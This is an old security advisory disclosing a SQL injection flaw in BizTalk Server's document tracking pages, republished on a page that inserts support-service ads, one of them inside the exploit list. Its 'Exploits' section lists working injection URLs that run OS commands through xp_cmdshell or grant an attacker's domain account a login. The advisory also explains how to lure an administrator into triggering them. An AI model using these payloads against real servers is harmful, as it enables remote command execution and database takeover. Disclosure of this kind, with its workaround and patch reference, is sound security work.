Microsoft Biztalk Server DTA vulnerable to SQL injection

Security Advisory

Name: Microsoft Biztalk Server Document Tracking and Admnistration vulnerable to SQL injection System Affected : BizTalk Server 2000 and BizTalk Server 2002
Severity : High
Remote exploitable : Yes
Author: Cesar Cerrudo.
Date: 05/05/03
Advisory Number: CC040302

Legal Notice:

This Advisory is Copyright (c) 2003 Cesar Cerrudo. You may distribute it unmodified and for free. You may NOT modify it and distribute it or distribute parts of it without the author's written permission. You may NOT use it for commercial intentions (this means include it in vulnerabilities databases, vulnerabilities scanners, any paid service, etc.) without the author's written permission. You are free to use Microsoft bulletin's details for commercial intentions.

Disclaimer:

The information in this advisory is believed to be true though it may be false.
The opinions expressed in this advisory are my own and not of any company. The usual standard disclaimer applies, especially the fact that Cesar Cerrudo is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory. Cesar Cerrudo bears no responsibility for content or misuse of this advisory or any derivatives thereof.

Overview:

Microsoft Biztalk Server is a Microsoft product for business-process automation
and application-integration both within and between businesses. BizTalk Server
provides a powerful Web-based development and execution environment that integrates
loosely coupled, long-running business processes, both within and between companies.
BizTalk Server features include integration among existing applications; the definition
of document specifications and specification transformations; and the monitoring and logging of run-time activity. The server provides a standard gateway for sending and
receiving documents across the Internet, as well as providing a range of services that
ensure data integrity, delivery, security, and support for the BizTalk Framework and
other key document formats.
Microsoft BizTalk Server provides the ability for administrators to manage documents via
a Document Tracking and Administration (DTA) web interface. A SQL Injection vulnerability exists in some of the pages used by DTA that could allow an attacker to send a crafted URL query string to a legitimate DTA user and to execute a malicious embedded SQL statement in
the query string.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Details:

BizTalk Document Tracking and Administration is a stand-alone Web application that you can use to view interchanges and documents that you configured to be tracked in Microsoft
BizTalk Server. Biztalk Server uses SQL Server as a backend database server.
Only members of Windows administrators or BizTalk Server Report Users local groups
are granted by default to use Biztalk Document Tracking and Administration user interface and view tracked documents.
The web application authenticate users by Windows authentication, the credentials are
also used to authenticate to SQL Server. The web application is located at:

http://server/biztalktracking/

There are two ASP pages on the web application that connect from server side to SQL
Server that are vulnerable to SQL injection:

http://server/biztalktracking/rawdocdata.asp

http://server/biztalktracking/RawCustomSearchField.asp

Exploits:

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.xp_cmdshell 'any OS command'--

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.xp_cmdshell 'any OS command'--  

or

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.sp_grantlogin 'domain\attacker'--

http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.sp_grantlogin 'domain\attacker'--

...etc.

There are others ASP and HTML pages in the Web application that connect to SQL Server
with activex components from client side that are also vulnerable to SQL injection.
But when a user access these pages a warning message is displayed by Internet Explorer
with default security settings for Intranet Zone: "This page access data on another domain. Do you want to allow this"
Making the explotation harder without alarming the targeted administrators.

This vulnerability can be exploited throght XSS or sending an administrator
an HTML e-mail, etc. targeting the vulnerable server. Explotation of this vulnerability allows an attacker to complete compromise
SQL Server and could lead to further OS compromise.

Workaround:

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Edit ASP and HTML source files to filter malicious input.

Vendor Status :

Microsoft was contacted 02/14/03, we work together and Microsoft released a fix.

Patch Available :

http://www.microsoft.com/technet/security/bulletin/MS03-016.asp  

NEW SECURITY LIST!!!: For people interested in SQL Server security, vulnerabilities, SQL injection, etc., I'm starting a new mailing list.
People subscribed to the list received this advisory five days ago!!.
Join at:

sqlserversecurity-subscribe@yahoogroups.com http://groups.yahoo.com/group/sqlserversecurity/